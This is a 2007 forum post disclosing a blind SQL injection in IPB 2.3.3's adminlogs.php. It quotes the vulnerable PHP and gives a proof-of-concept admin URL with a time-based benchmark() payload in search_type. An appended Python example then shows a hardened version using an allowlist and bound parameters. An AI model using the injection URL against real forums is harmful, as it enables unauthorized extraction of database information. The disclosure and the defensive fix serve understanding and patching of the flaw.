IPB <= 2.3.3 blind sql-injection
Posted by: perdimonokl
Date: December 02, 2007 10:08AM

-------------
adminlogs.php
-------------

BUG FOUND: perdimonokl aka 4nob1oz
BUG FOUND DATE: 24/11/2007

/*
* VULN FUNCTION
* ----------------
*
* function view()
*
* ----------------
* VULN CODE
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* else
* {
* $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
*
* $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
*
* $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
*
* $row_count = $row['count'];
*
* $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
*
* $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
* $this->ipsclass->DB->cache_exec_query();
* }
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*
*/

EXPLOIT
-------

adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you log in to the admin panel you open an admin session, and you can see it in the variable "adsess="

Replace the "adsess=" in the URL with your own

http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf&section=admin&act=adminlog&code=view&act=adminlog&section=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=5,1,benchmark(999999,md5(now())))--

Just for you, bugtrack :) I found it 2 or 3 weeks ago
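A hardened version of the adminlogs search described above, as an added example that is not part of the original post or of IPB's code: it models the two inputs in Python with sqlite3 rather than the board's PHP DB layer. `search_type` is an identifier and so cannot be bound, so it is checked against an allowlist (only `act` comes from the report; the other two column names are assumed), while `search_string` is bound as a parameter with its LIKE metacharacters escaped.

```python
import re
import sqlite3

# Columns of admin_logs that search_type may name.  'act' is the column used
# in the original report; the other two names are assumed for this example.
ALLOWED_SEARCH_TYPES = {"act", "query_string", "member_id"}

# The search_type value from the report's URL, used here only as rejected input.
INJECTED_SEARCH_TYPE = ("act and 1=if(substring(version(),1,1)=5,1,"
                        "benchmark(999999,md5(now())))--")

class InvalidSearchType(ValueError):
    """search_type did not name an allowed admin_logs column."""

def build_where(search_type, search_string):
    """Return (where_sql, params) for the admin-log search: search_type is
    allowlisted (identifiers cannot be bound), search_string is bound and its
    LIKE metacharacters are escaped so input never acts as a wildcard."""
    if search_type not in ALLOWED_SEARCH_TYPES:
        raise InvalidSearchType(search_type)
    escaped = re.sub(r"([%_\\])", r"\\\1", search_string)
    return f"m.{search_type} LIKE ? ESCAPE '\\'", ["%" + escaped + "%"]

def count_logs(conn, search_type, search_string):
    """The COUNT(m.id) query from adminlogs.php, built from build_where()."""
    where, params = build_where(search_type, search_string)
    sql = f"SELECT COUNT(m.id) AS count FROM admin_logs m WHERE {where}"
    return conn.execute(sql, params).fetchone()[0]

def make_sample_db():
    """Constructed admin_logs table with three sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_logs (id INTEGER PRIMARY KEY, act TEXT,"
                 " query_string TEXT, member_id INTEGER)")
    conn.executemany(
        "INSERT INTO admin_logs (act, query_string, member_id) VALUES (?, ?, ?)",
        [("adminlog", "code=view", 1), ("members", "code=edit", 1),
         ("adminlog", "code=view&search_string=333", 2)])
    return conn

if __name__ == "__main__":
    db = make_sample_db()
    print(count_logs(db, "act", "adminlog"))    # 2
    print(count_logs(db, "query_string", "%"))  # 0: '%' is matched literally
    try:
        count_logs(db, INJECTED_SEARCH_TYPE, "333")
    except InvalidSearchType as exc:
        print("rejected search_type:", exc)
```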
